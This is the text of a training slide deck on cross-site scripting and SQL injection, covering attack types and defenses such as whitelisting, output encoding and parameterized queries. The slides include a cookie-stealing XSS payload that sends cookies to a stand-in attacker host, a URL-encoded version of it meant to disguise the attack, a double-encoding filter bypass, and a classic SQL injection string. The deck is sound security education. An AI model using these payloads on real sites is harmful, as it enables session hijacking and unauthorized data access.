Cross Site Scripting SQL injection Hakan Tolgay hakanhakantolgay
- Slides: 31
Cross Site Scripting & SQL injection Hakan Tolgay hakan@hakantolgay. com 15. 01. 2015
Input/Output handling - SOP § SOP – Same Origin Policy § SOP, is a security measure used in Web browser programming languages such as Java. Script and Ajax to protect the confidentiality and integrity of information. § Same Origin Policy prevents a web site's scripts from accessing and interacting with scripts used on other sites. § To do that Protocol Domain name Port
Input/Output handling - SOP http: //www. example. com. tr: 80/anon/bad. js http: //www. example. com. tr/admin/page. aspx https: //www. example. com. tr/admin/page. aspx http: //example. tr/anon/page. aspx http: //example. tr: 81/admin/page. aspx
Input/Output handling – Whats the problem § The typical problem in web applications is mixing of data and the malicious code. § Input fields of a web application can be exploited by hackers unless required checks are made. § Input fields should not be seen as simple text boxes.
What is Javascript § Java. Script is a programming language used to make web pages interactive. § It runs on your visitor's computer and doesn't require constant downloads from website. § Java. Script is often used to create polls and quizzes.
Cross Site Scripting (XSS) – Introduction § XSS is a vulnerability that allows an attacker to run arbitrary Java. Script in the context of the vulnerable website. § Exploit in Javascript § Is not depended on a specific platform or language
XSS – Introduction § The target of XSS attack is other users. § In the 3 rd place of OWASP top 10 security risk list (OWASP top 10 2013 is available in the training materials) § Thus, basically § Cross Site Scripting is when attackers use vulnerabilities in your web application to distribute malicious scripts to other users (which then run other users web browsers)
Types of XSS § Reflected XSS § Link in other website or email § Stored XSS § Forum, bulletin board, feedback form § DOM Based XSS § PDF Adobe Reader , FLASH player
Reflected XSS
Reflected XSS §Say that the www. netas. com. tr welcome page is vulnerable to a XSSS attack since a welcome message can be displayed on the welcome page with the user's name passed as a parameter: § http: //www. netas. com. tr/? nom=Hakan § Pass the following Javascript code as the name parameter, in order to redirect the user to a page atacker controls § <SCRIPT> document. location='http: //site. pirate/cgi-bin/script. cgi? '+document. cookie </SCRIPT> § The above code retrieves the user's cookies and sends them as parameters to a CGI script. The following code passed as a parameter would be too visible: § http: //www. netas. com. tr/? nom=<SCRIPT>document. location ='http: //site. pirate/cgibin/script. cgi? '+document. cookie</SCRIPT> §However, coding the URL makes it possible to disguise the attack: § http: //www. netas. com. tr/? nom=%3 c%53%43%52%49%50%54%3 e%64%6 f%63%75%6 d%65% 6 e%74%2 e%6 c%6 f%63%61%74%69%6 f%6 e%3 d%5 c%27%68%74%74%70%3 a%2 f%2 f%73%69%74% 65%2 e%70%69%72%61%74%65%2 f%63%67%69%2 d%62%69%6 e%2 f%73%63%72%69%70%74%2 e% 63%67%69%3 f%5 c%27%20%64%6 f%63%75%6 d%65%6 e%74%2 e%63%6 f%6 f%6 b%69%65%3 c%2 f% 53%43%52%49%50%54%3 e
Reflected XSS
Reflected XSS – DEMO
Stored XSS §Java. Script supplied by the attacker is stored by the website (e. g. in a database) §Doesn’t require the victim to supply the Java. Script somehow, just visit the exploited web page §More dangerous than Reflected XSS
Stored XSS – DEMO
XSS – What can you do with Java. Script § Pop-up alerts and prompts § Access cookies/session tokens § Detect installed programs § Detect browser history § Capture keystrokes (and other trojan functionality) § Port scan the local network § Redirect to a different web site § Determine if they are logged on to a particular site § Capture clipboard content § Detect if the browser is being run in a virtual machine § Rewrite the status bar § Exploit browser vulnerabilities § Launch executable files (in some cases)
XSS - Defense § What can be done?
Defense - Blacklisting approach § Blacklist has items which shouldn’t have § Is fast to set up, but can be bypassed more easily by a skilled attacker. §Do not use "blacklist" validation to detect XSS in input or to encode output. § Searching for and replacing just a few characters ("<" ">" and other similar characters or phrases such as “script”) is weak and has been attacked successfully. § Even an unchecked “<b>” tag is unsafe in some contexts. XSS has a surprising number of variants that make it easy to bypass blacklist validation.
Defense - Whitelisting approach §Whitelist has items which should have §Whitelisting allows for a much stronger security solution than blacklisting but comes with a steep learning curve. Once mastered, though, whitelisting is very effective at stopping XSS attacks.
Defense - Encoding/Decoding § Encoding variable output substitutes HTML markup with alternate representations called entities § By using double encoding it’s possible to bypass security filters that only decode user input once.
Encoding Demo
Defense - Encoding/Decoding - Example § <script>alert('XSS')</script> § Web application can have a character filter which prohibits characters such as “< “, “>” and “/”, since they are used to perform web application attacks. § The attacker could use a double encoding technique to bypass the filter and exploit the client’s session. The encoding process for this Java script is: §Finally, the malicious double encoding code is: §%253 Cscript%253 Ealert('XSS')%253 C%252 Fscript%253 E
Defense § Never Insert Untrusted Data Except in Allowed Locations in OWASP XSS prevention list rules § Check https: //www. owasp. org/index. php/XSS_%28 Cross_Site_Scripting%29_Prevention_Cheat_Sheet
What is SQL §Structured Query Language §A Language designed for managing data held in databases § Examples: § SELECT * FROM users. Table WHERE uname = ‘hakan’ § SELECT isbn, title, price FROM Book WHERE price > 100. 00 ORDER BY title;
What is SQL – more example §SELECT Name, Surnamme FROM Custome WHERE Age > 30; Customer Result Set Name Surname Age Sex Lisa Becker 37 F Erwin Visser 31 M Lara Martini 24 F Alan Newman 29 M
SQL Injection § Sending parameters directly from application to the database server can cause unauthorized queries. § #1 at top 10 security risk list
SQL Injection § statement = "SELECT * FROM users WHERE name ='" + user. Name + "'; § ' or '1'='1 § SELECT * FROM users WHERE name = '' OR '1'='1';
SQL Injection – DEMO
SQL Injection – Defense §Use parameterized queries § For Java use Prepared. Statement § For c# use Parameters. Add §Check OWASP SQL injection cheat sheet § https: //www. owasp. org/index. php/SQL_Injection_Prevention_Cheat_Sheet
Thank You
- Hakan tolgay
- Cross site scripting cookie stealing
- Common cause of buffer overflow cross-site scripting
- Fuzzing sql injection
- Injection sql tutorial
- Rick houlihan
- Mongo sql injection
- Xkcd security
- Sql injection 종류
- Injection
- Akamai waf bypass
- Sql injection
- An attacker injects the following sql query blah
- Scenario examples
- Sybase sql injection
- Oracle apex security
- Dsteamseguridad
- Dvwa csrf high
- Intval sql injection
- Pl sql injection
- Mongodb id 자동증가
- Sql injection comic
- Xkcd
- Nhibernate cache
- Inurl:url=http
- أنواع sql injection
- Hot site cold site warm site disaster recovery
- Sql and plsql difference
- Pl/sql unit testing
- Hakan tureci
- Robert hakan
- Hakan kutucu veri yapıları